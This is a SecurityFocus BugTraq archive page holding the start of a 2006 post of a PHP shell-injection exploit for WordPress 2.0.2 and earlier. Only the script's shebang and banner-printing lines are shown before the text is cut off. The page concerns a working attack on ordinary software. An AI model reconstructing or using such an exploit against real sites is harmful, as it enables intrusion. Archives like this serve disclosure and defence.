BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Wordpress <=2.0.2 'cache' shell injection May 25 2006 07:01PM
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on

<?

echo "--------------------------------------------------------------------\r\
n";

echo "| WordPress <= 2.0.2 'cache' shell injection exploit |\r\n";

echo "| by rgod rgod (at) autistici (dot) org [email concealed] |\r\n";

echo "| si...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus